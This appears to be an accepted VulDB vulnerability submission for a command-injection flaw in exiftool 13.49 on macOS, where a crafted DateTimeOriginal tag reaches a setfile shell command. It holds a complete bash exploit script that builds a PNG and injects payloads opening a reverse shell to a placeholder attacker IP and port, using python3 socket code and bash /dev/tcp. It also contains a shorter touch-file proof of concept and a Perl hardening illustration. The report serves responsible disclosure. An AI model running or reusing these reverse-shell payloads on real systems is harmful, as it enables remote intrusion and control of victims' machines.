Submission #758146: Exiftool 13.49 Arbitrary Code Execution - Info

Title: Exiftool 13.49 Arbitrary Code Execution
Description:

Here is the patch: https://github.com/exiftool/exiftool/commit/e9609a9bcc0d32bd252a709a562fb822d6dd86f7#diff-4e4ae7685b587fd469108c25437f7d9ad6e3defc6394d8681b38e36863467baaR416

POC: Only for MacOS, due to /usr/bin/setfile being used, which is part of a toolchain in Mac and also gated by a check for OS 'darwin'.

Use any png/jpg and name it evil_benign.jpg:

```
../../exiftool -n -DateTimeOriginal="2026:02:07'\$(touch /tmp/exiftool_poc)'" ./evil_benign.jpg
cp evil_benign.jpg pwn.jpg; ../../exiftool -n -tagsFromFile evil_benign.jpg "-FileCreateDate<DateTimeOriginal" pwn.jpg
```

If this works, you should see `/tmp/exiftool_poc`.

I was able to write a script to create a minimal png file, run this and get back a reverse shell: https://www.youtube.com/watch?v=akk0vmilfb4

To run: "DEBUG=1 ./poc.sh"

Not sure if you will want to process this, but I have contacted MITRE for a while now and there has been no response from them (my first time, so I am not sure what the lead time is).

```sh
#!/usr/bin/env bash
DEBUG="${DEBUG:-0}"
dbg() {
    [[ "$DEBUG" == "1" ]] && echo -e "$@"
}
POC_FILEPATH="/tmp/POC1"

# we cannot use python3 -m http.server 8080 since "-" is actually filtered out
# Recall the regex:
# KEEP IN MIND
# $val =~ s{(\d{4}):(\d{2}):(\d{2})}{$2/$3/$1}; # reformat for setfile
# $cmd = "/usr/bin/setfile -d '${val}' '${f}'";
KALI_IP="<ATTACKER IP>"
KALI_PORT="<ATTACKER PORT>"
PAYLOAD="'; touch ${POC_FILEPATH}; (echo 'import socket,subprocess,os;s=socket.socket();s.connect((\"${KALI_IP}\",${KALI_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"])' | python3 &); #"
PAYLOAD="'; touch ${POC_FILEPATH}; (bash </dev/tcp/${KALI_IP}/${KALI_PORT} 1>&0 2>&0 &); #"
PATH_TO_EXIFTOOL="../exiftool"

# Check if pocfile exists. If yes, delete it
if [[ -f $POC_FILEPATH ]]; then rm -f $POC_FILEPATH; fi

################################################################################################################
####################################### CREATE PNG OR JUST IMPORT AN EXISTING ONE ##############################
################################################################################################################
dbg "\t[+] Creating benign PNG file"
out="${1:-benign.png}"
# 1x1 transparent PNG
{
    printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A'
    printf '\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89'
    printf '\x00\x00\x00\x0A\x49\x44\x41\x54\x78\x9C\x63\x00\x01\x00\x00\x05\x00\x01\x0D\x0A\x2D\xB4'
    printf '\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82'
} > "$out"

################################################################################################################
####################################### ADD PAYLOAD TAG THEN TRIGGER CODE PATH #################################
################################################################################################################
dbg "\t[+] Setting Payload"
dbg "\t[+] Payload : ${PAYLOAD}"
cp ./benign.png ./evil.png
dbg "\t[+] Adding tag to evil.png"
$PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png
#$PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png > /dev/null
dbg "\t[+] Triggering Vulnerability when Copying Tag to FileCreateDate"
#$PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png > /dev/null
$PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png
dbg "\t[*] Bytes in benign.png"
[[ "$DEBUG" == "1" ]] && xxd ./benign.png
dbg "\t[*] Bytes in evil.png"
[[ "$DEBUG" == "1" ]] && xxd ./evil.png
dbg "[+] Removing artefacts"
rm evil.png* benign.png

################################################################################################################
####################################### CHECK FOR SUCCESSFUL EXPLOITATION ######################################
################################################################################################################
if [[ -f $POC_FILEPATH ]]; then
    dbg "[+] Exploit Completed"
else
    dbg "[-] Something went wrong. This should work for Exiftool v13.49 and below"
fi
```
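The report quotes the two Perl lines at the heart of the issue: the tag value is reformatted with a non-anchored substitution and then interpolated into a single shell command string. The Perl below is an added illustration written for this record (it is neither the submitter's script nor exiftool's own patch, and the function names are hypothetical); it places that unsafe shape beside a hardened one that validates the whole date value and hands setfile an argument list via list-form system(), so no shell ever parses the tag.

```perl
#!/usr/bin/env perl
# Added illustration, not exiftool's code: the interpolation pattern quoted in the
# report beside a hardened variant. Function names here are hypothetical.
use strict;
use warnings;

# Shape quoted in the report: the tag value is interpolated into one command
# string that /bin/sh parses, so a value containing a quote ends the -d argument
# early and the remainder of the value is executed as further shell commands.
sub build_cmd_unsafe {
    my ($val, $f) = @_;
    $val =~ s{(\d{4}):(\d{2}):(\d{2})}{$2/$3/$1};   # reformat for setfile
    return "/usr/bin/setfile -d '${val}' '${f}'";
}

# Hardened: accept only an EXIF-style date (optionally followed by a time),
# anchored to the whole string, and return an argument list rather than a string.
sub setfile_args {
    my ($val, $f) = @_;
    my ($y, $mo, $d, $time) =
        $val =~ m{\A([0-9]{4}):([0-9]{2}):([0-9]{2})(?: ([0-9]{2}:[0-9]{2}:[0-9]{2}))?\z}
        or return;                        # anything else is rejected (empty list)
    my $date = "$mo/$d/$y";
    $date .= " $time" if defined $time;
    return ('/usr/bin/setfile', '-d', $date, $f);
}

# List-form system() passes argv straight to execvp: no shell sees $date or $f.
sub set_creation_date {
    my ($val, $f) = @_;
    my @cmd = setfile_args($val, $f) or return 0;   # rejected value: do nothing
    return system(@cmd) == 0;
}

# Constructed sample values; only the resulting argument list is printed,
# nothing is executed and no file is touched.
my @samples = ('2026:02:07 10:30:00', q{2026:02:07'; touch /tmp/exiftool_poc; #});
for my $v (@samples) {
    my @args = setfile_args($v, 'photo.png');
    printf "%-40s => %s\n", $v, @args ? join(' ', map { "[$_]" } @args) : 'REJECTED';
}
```

The first sample yields the four-element argument list `[/usr/bin/setfile] [-d] [02/07/2026 10:30:00] [photo.png]`; the second is rejected before any command is built, which is the check the quoted code lacked.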
User: owl4444 (UID 95583)
Submitted: 2026-02-14 06:49 (4 months ago)
Moderation: 2026-02-24 10:53 (10 days later)
Status: Accepted
VulDB Entry: 347528 [exiftool up to 13.49 on macOS PNG File Parser MacOS.pm SetMacOSTags DateTimeOriginal privilege escalation]
Points: 17